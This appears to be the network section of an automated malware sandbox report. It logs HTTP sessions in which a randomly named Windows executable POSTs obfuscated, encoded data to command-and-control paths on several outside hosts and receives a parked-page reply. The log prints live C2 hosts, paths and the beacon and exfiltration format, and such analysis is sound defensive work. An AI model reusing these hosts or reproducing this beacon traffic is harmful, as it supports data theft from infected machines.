                                                                                                                                                                                                              26192.168.2.960841208.91.197.27801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:35:23.320000887 CEST773OUTPOST /bnrz/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.palcoconnector.net
                                                                                                                                                                                                              Origin: http://www.palcoconnector.net
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 217
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.palcoconnector.net/bnrz/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 44 53 5a 51 77 74 75 50 74 4c 35 6a 53 72 34 48 46 4f 55 51 63 62 6f 68 6e 52 76 50 30 5a 41 35 61 4b 38 48 6a 77 59 4e 51 36 44 51 4a 6b 41 32 30 33 64 51 30 64 4e 62 50 36 32 6d 78 32 39 34 36 45 63 45 31 77 78 35 6a 52 56 58 77 32 57 34 69 2f 45 69 35 2f 41 55 72 2f 4a 45 73 67 2b 6c 2b 33 4b 79 39 55 53 78 46 2b 39 71 38 39 57 77 6b 6d 6e 64 51 76 6e 42 32 61 37 5a 31 4e 6b 4c 38 63 52 78 73 43 56 75 49 42 36 48 76 78 6d 55 36 4f 76 39 64 4e 34 33 6d 6a 43 36 52 69 65 30 6a 62 70 34 62 71 7a 76 73 47 2b 6c 4e 2b 67 43 70 74 37 62 48 6d 48 59 5a 65 4a 51 5a 71 72 5a 5a 61 54 68 2b 53 50 6f 44 68 4e 52 75 31 37 70 71 67 3d 3d
                                                                                                                                                                                                              Data Ascii: tpTd=DSZQwtuPtL5jSr4HFOUQcbohnRvP0ZA5aK8HjwYNQ6DQJkA203dQ0dNbP62mx2946EcE1wx5jRVXw2W4i/Ei5/AUr/JEsg+l+3Ky9USxF+9q89WwkmndQvnB2a7Z1NkL8cRxsCVuIB6HvxmU6Ov9dN43mjC6Rie0jbp4bqzvsG+lN+gCpt7bHmHYZeJQZqrZZaTh+SPoDhNRu17pqg==


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              27192.168.2.960842208.91.197.27801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:35:25.867177963 CEST1786OUTPOST /bnrz/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.palcoconnector.net
                                                                                                                                                                                                              Origin: http://www.palcoconnector.net
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 1229
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.palcoconnector.net/bnrz/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 44 53 5a 51 77 74 75 50 74 4c 35 6a 53 72 34 48 46 4f 55 51 63 62 6f 68 6e 52 76 50 30 5a 41 35 61 4b 38 48 6a 77 59 4e 51 36 4c 51 4a 32 49 32 31 51 68 51 31 64 4e 62 4f 36 32 6e 78 32 39 6c 36 45 30 2b 31 77 39 48 6a 58 5a 58 78 55 75 34 6b 4c 51 69 73 76 41 55 69 66 4a 4a 69 41 2f 6e 2b 33 36 75 39 55 43 78 46 2b 39 71 38 38 6d 77 30 6e 6e 64 57 76 6e 41 31 61 37 46 78 4e 6c 6d 38 59 46 48 73 43 42 55 4c 79 69 48 75 52 57 55 2f 37 37 39 56 4e 34 31 68 6a 44 6c 52 69 44 30 6a 62 31 53 62 72 58 4a 73 46 75 6c 50 50 52 2b 75 64 6e 34 52 51 4c 61 57 4e 35 54 57 36 6a 75 42 5a 57 59 72 53 2f 78 51 6b 4d 32 71 52 33 69 35 47 31 41 59 41 65 43 38 2f 79 56 61 4b 57 71 44 65 70 63 7a 41 39 2b 46 74 4b 43 34 42 64 75 48 4a 69 35 55 38 4a 53 34 64 46 4a 6f 53 6a 66 39 2b 74 55 41 4e 36 70 35 53 55 6f 31 37 54 6d 52 31 72 38 43 67 6b 38 71 62 67 6e 58 4f 31 39 37 2b 5a 72 57 47 66 75 66 56 65 55 64 75 43 79 57 34 68 6d 46 70 7a 75 5a 34 32 65 7a 68 38 71 79 41 52 7a 4c 6b 7a 30 41 69 51 6a 67 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: tpTd=DSZQwtuPtL5jSr4HFOUQcbohnRvP0ZA5aK8HjwYNQ6LQJ2I21QhQ1dNbO62nx29l6E0+1w9HjXZXxUu4kLQisvAUifJJiA/n+36u9UCxF+9q88mw0nndWvnA1a7FxNlm8YFHsCBULyiHuRWU/779VN41hjDlRiD0jb1SbrXJsFulPPR+udn4RQLaWN5TW6juBZWYrS/xQkM2qR3i5G1AYAeC8/yVaKWqDepczA9+FtKC4BduHJi5U8JS4dFJoSjf9+tUAN6p5SUo17TmR1r8Cgk8qbgnXO197+ZrWGfufVeUduCyW4hmFpzuZ42ezh8qyARzLkz0AiQjgsQ3e50uoe4cKHN7wehzcLfeT819cg3lLMrDSoKMTe7iREpTGVjWDiTR7TVgDOJHDReLctWGnSzC7VT/B9WujSNUE0HYlgTLVDtzYZmVFK8gS9ubi7jrQE8sRMAZmCB1dmsSGlTLiTt4diglHqOuHNROYZwdBPeGFuPI2OutwNMkpIqXL72iLq8hBJPZORaBOF7NeqHoXLEi8JvveWL3qd3u2w6afgmMrM21aZiA5XMV1n6d6vlyHTEm8ROVyX9IxKJlPQSXtcnYuqruGFrZP9FksJYQLthYdR6H9X2OhH7wu07w1/aTCH0l/7SQ+wHJ2Gfs91MLYP79l31yLNruhhcVKl0YZDaCWZkdF1VrV9R8wZ3SJrKDGUJGjY1dD3xj4rMTyBWVrfy9tq97YmpfA2pyj0POzsqRAs5X2pvtVjLSzOXsUProvJo8wSy+5JNduPbLzQejSbl1QF+1KXmObrOcKO8gFEy6iYUxzfBv1iZ2zgfPlWuOSVaQI1NEKlR1jQI1Qlnj8sECb+2zF+Gr/mO8uNhkEYdD3GedGCrQin+/oEQLw4beuukcaA/xzjC+mEh0bD112wDGLbqkcrp8n7OjaSqSOzMO9tdeQa+1i+bESLS+DxwhjgiIZfe8npZz4yfNZGMLlNY2cQLrggh3HAwmICl4OPxvbnY [TRUNCATED]


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              28192.168.2.960843208.91.197.27801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:35:28.410914898 CEST479OUTGET /bnrz/?tpTd=OQxwzbuOtqgqEYELNcMucZtHnRjB34c8S/VejUlVZtuveUVj7y4E7KtMGd+fy1MLwhM03wpJ8ksC3Umpmq48p+wh68NaozaF8Wex7USlPt5ZhMWe3g==&WX=rnWllP5PLlhLLtj HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.palcoconnector.net
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515738964 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:35:28 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                              Set-Cookie: vsid=908vr47594012900756934; expires=Sun, 07-Oct-2029 13:35:29 GMT; Max-Age=157680000; path=/; domain=www.palcoconnector.net; HttpOnly
                                                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_eeOY20v5H5Oq/uqAcmU3jU1VXFZVeIlL7RScKo7CsXQgAYiRiYpYfV0QsvrldM8t5IEa6SxtbsI3NQ9r0dxpXg==
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Data Raw: 61 31 37 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74
                                                                                                                                                                                                              Data Ascii: a172<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515763044 CEST1236INData Raw: 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e
                                                                                                                                                                                                              Data Ascii: "> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515779018 CEST1236INData Raw: 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e 67
                                                                                                                                                                                                              Data Ascii: ion(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="language
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515791893 CEST1236INData Raw: 75 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61
                                                                                                                                                                                                              Data Ascii: uages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515803099 CEST896INData Raw: 68 2e 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22 2b
                                                                                                                                                                                                              Data Ascii: h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515814066 CEST1236INData Raw: 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e 62 6f 64 79 29 7b 75 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64
                                                                                                                                                                                                              Data Ascii: t){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("hea
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515825033 CEST1236INData Raw: 6e 67 74 68 29 7b 72 65 74 75 72 6e 20 5f 5f 63 6d 70 2e 61 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 70 69 6e 67 22 29 7b 69 66 28 61 5b 31 5d 3d 3d 3d 32 29 7b 61 5b 32 5d 28 7b 67 64 70 72 41 70 70 6c 69 65 73 3a 67 64 70 72 41 70 70
                                                                                                                                                                                                              Data Ascii: ngth){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}else{a[2](false,true)}}else{if(a[0]==="getUSPData"){a[2]({v
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515837908 CEST1236INData Raw: 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 5f 5f 67 70 70 2e 65 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 69 66 28 5f 5f 67 70 70 2e 65 5b 64 5d 2e 69 64 3d 3d 65 29 7b 5f 5f 67 70 70 2e 65 5b 64 5d 2e 73 70 6c 69 63 65 28 64 2c 31 29 3b 68 3d 74 72
                                                                                                                                                                                                              Data Ascii: for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemoved",listenerId:e,data:h,pingData:window.cmp_gpp_ping()}}else{if(g==="getGPPData"){return{sectionId:3,gppVersion:1,sectio
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.516009092 CEST1236INData Raw: 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a 22 29 7d 2c 62 2e 70 61 72 61 6d 65 74 65 72 29 7d 69 66 28 74 79 70 65 6f 66 28 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 6c
                                                                                                                                                                                                              Data Ascii: tMessage(a?JSON.stringify(e):e,"*")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.516020060 CEST235INData Raw: 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 67 70 70 4c 6f 63 61 74 6f 72 22 29 7d 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 63 6d 70 22 29 3b 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 22 20 69 6e 20
                                                                                                                                                                                                              Data Ascii: cmp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cmp_setStub("__tcfapi")}if(!("cmp_disableusp" in window)||!window.cmp_disableusp){window.cmp_setStub("__uspapi")}
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.521941900 CEST1236INData Raw: 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 47 70 70 53 74 75 62 28 22 5f
                                                                                                                                                                                                              Data Ascii: if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.palcoconnector.net/px.js?ch=1"></script><script t


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              29192.168.2.960844156.242.132.82801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:35:35.399240017 CEST740OUTPOST /b6g5/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.shanhaiguan.net
                                                                                                                                                                                                              Origin: http://www.shanhaiguan.net
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.shanhaiguan.net/b6g5/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 58 2b 34 4b 50 56 34 76 6a 79 46 4e 38 52 72 6b 52 69 70 76 4f 36 47 33 42 49 6b 6e 57 66 54 36 36 61 37 78 6c 42 61 61 76 35 43 41 45 6a 7a 4f 79 43 69 76 36 46 64 57 77 65 2f 30 6c 2f 57 4f 32 57 33 44 45 48 68 73 76 7a 41 79 36 4d 46 67 4b 7a 6e 32 76 43 52 72 6d 68 66 50 6a 63 46 44 78 55 6a 41 49 35 32 69 56 6c 32 33 6c 53 78 47 55 75 31 4e 68 53 71 39 56 5a 6a 46 73 6a 56 6f 2f 6a 48 41 71 6c 56 6d 44 59 76 37 4c 30 76 66 5a 78 6d 67 70 35 6a 4f 62 67 4b 79 56 30 39 4b 69 30 59 2b 47 30 59 70 43 39 36 6d 75 66 4b 4e 4b 6c 64 73 51 33 48 71 71 72 77 61
                                                                                                                                                                                                              Data Ascii: tpTd=X+4KPV4vjyFN8RrkRipvO6G3BIknWfT66a7xlBaav5CAEjzOyCiv6FdWwe/0l/WO2W3DEHhsvzAy6MFgKzn2vCRrmhfPjcFDxUjAI52iVl23lSxGUu1NhSq9VZjFsjVo/jHAqlVmDYv7L0vfZxmgp5jObgKyV09Ki0Y+G0YpC96mufKNKldsQ3Hqqrwa


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              30192.168.2.960845156.242.132.82801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:35:37.943063021 CEST764OUTPOST /b6g5/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.shanhaiguan.net
                                                                                                                                                                                                              Origin: http://www.shanhaiguan.net
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 217
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.shanhaiguan.net/b6g5/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 58 2b 34 4b 50 56 34 76 6a 79 46 4e 38 78 62 6b 54 42 42 76 66 61 47 30 45 49 6b 6e 64 2f 54 2b 36 61 33 78 6c 41 75 77 76 4c 6d 41 45 44 44 4f 67 32 57 76 33 6c 64 57 34 2b 2f 39 34 50 57 52 32 57 72 4c 45 48 64 73 76 7a 55 79 36 4a 35 67 4a 45 4c 31 74 53 52 70 70 42 66 4e 73 38 46 44 78 55 6a 41 49 35 6a 4a 56 6c 75 33 69 6d 31 47 55 4c 42 43 2b 69 71 2b 53 5a 6a 46 6f 6a 56 73 2f 6a 48 75 71 6c 6c 4d 44 65 6a 37 4c 78 44 66 61 67 6d 6a 6e 35 6a 49 45 77 4c 77 46 6d 39 46 72 6d 30 61 4a 31 51 63 51 37 69 4f 74 2b 71 54 62 58 55 33 46 67 48 4e 74 4d 35 79 56 61 4c 59 52 6a 38 30 6f 32 6e 2f 51 4c 43 42 31 37 36 72 49 51 3d 3d
                                                                                                                                                                                                              Data Ascii: tpTd=X+4KPV4vjyFN8xbkTBBvfaG0EIknd/T+6a3xlAuwvLmAEDDOg2Wv3ldW4+/94PWR2WrLEHdsvzUy6J5gJEL1tSRppBfNs8FDxUjAI5jJVlu3im1GULBC+iq+SZjFojVs/jHuqllMDej7LxDfagmjn5jIEwLwFm9Frm0aJ1QcQ7iOt+qTbXU3FgHNtM5yVaLYRj80o2n/QLCB176rIQ==


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              31192.168.2.960846156.242.132.82801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:35:40.489506006 CEST1777OUTPOST /b6g5/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.shanhaiguan.net
                                                                                                                                                                                                              Origin: http://www.shanhaiguan.net
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 1229
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.shanhaiguan.net/b6g5/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 58 2b 34 4b 50 56 34 76 6a 79 46 4e 38 78 62 6b 54 42 42 76 66 61 47 30 45 49 6b 6e 64 2f 54 2b 36 61 33 78 6c 41 75 77 76 4c 75 41 45 77 4c 4f 78 68 4b 76 32 6c 64 57 37 2b 2f 77 34 50 58 4e 32 57 7a 50 45 48 51 62 76 77 73 79 72 62 42 67 64 67 66 31 33 43 52 70 69 68 66 4f 6a 63 46 61 78 55 7a 4d 49 35 7a 4a 56 6c 75 33 69 67 5a 47 54 65 31 43 34 69 71 39 56 5a 6a 5a 73 6a 55 78 2f 6a 50 59 71 6b 52 32 57 2b 44 37 4c 52 54 66 57 79 4f 6a 76 35 6a 4b 48 77 4c 53 46 6d 77 46 72 6d 70 6c 4a 31 6b 6c 51 38 6d 4f 38 49 62 33 4e 56 59 53 47 43 37 4b 73 37 46 79 63 76 37 73 54 33 59 33 33 55 76 75 42 2b 43 51 77 59 76 2f 65 76 62 76 44 54 6a 5a 57 54 54 7a 71 39 4e 30 64 6e 59 6b 4d 34 31 52 64 2b 37 53 5a 68 2f 44 62 77 47 73 57 64 41 36 70 4b 52 34 4f 76 36 48 75 68 63 53 67 76 65 4e 75 2f 73 41 31 72 4f 36 30 64 34 38 47 54 78 6e 66 41 6b 59 2f 70 6e 78 5a 30 6c 41 48 5a 48 43 4b 65 46 52 42 6f 36 42 62 2f 63 59 4b 30 2b 36 6e 66 4c 32 51 33 30 75 63 37 50 39 35 34 31 31 79 34 56 6b 2f [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: tpTd=X+4KPV4vjyFN8xbkTBBvfaG0EIknd/T+6a3xlAuwvLuAEwLOxhKv2ldW7+/w4PXN2WzPEHQbvwsyrbBgdgf13CRpihfOjcFaxUzMI5zJVlu3igZGTe1C4iq9VZjZsjUx/jPYqkR2W+D7LRTfWyOjv5jKHwLSFmwFrmplJ1klQ8mO8Ib3NVYSGC7Ks7Fycv7sT3Y33UvuB+CQwYv/evbvDTjZWTTzq9N0dnYkM41Rd+7SZh/DbwGsWdA6pKR4Ov6HuhcSgveNu/sA1rO60d48GTxnfAkY/pnxZ0lAHZHCKeFRBo6Bb/cYK0+6nfL2Q30uc7P95411y4Vk/Ax4rOf7T07WYVQXtbVX4sLbU9lGxgqyuxBUEiXClwge0LMT8sbSN5OLOV7RlF/dXDSXPPxfbAywNRLDHlL0Qx7w7vpWqUp2FIelQqo0bEvRZ2l9J3oHEvkyRUvhQNITls/tGw2dvIHku6ezjpiZnL28kObc1SjlxNESR4LkCySRCGr1UDHkdHg92+Q7voOEbZ51plamU7wewx8bj8KfUa8UQqhDSKDMBYe3Z51xzvhLNO9NC8Cv+EXWGOwo4HgNfduX9j38o+sZPF2i8L+eccPzehWy1aMsMd1J0IGqbaIgIU2Qy/SqmOey1glmhxA5yW4NV/RHXMKmuH7eoGJB5JLe3pEqxcjBLMh9ophYhlFQMmkcSsG9cCurVbtcXXfFcJcghvVVWk8Nnva9TJtErxQJWs2NWfJwS4nsg8PS4pQrO+AueZ1WXvpLwtJKAKO1MglVJz58gXi+zKnyPY8BxZ6d3iY2OroNRx49FUXS03RYlzAFI26h/yz54irOijkLha853bg35LFQ8CsRgHwuU7yhSnPqw8fC57/FhZ2x1erCdlOqxkNEA9y87DQWEufZBoNpGUOaEIvow4/HMlOV2CGk3DfNnGDDzbnDgpI6MBZx+TTTMXEsUKUIY3L07K/pqf4rpxLzICxc2lIEuG0et/vc7doeYjL9+tT [TRUNCATED]


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
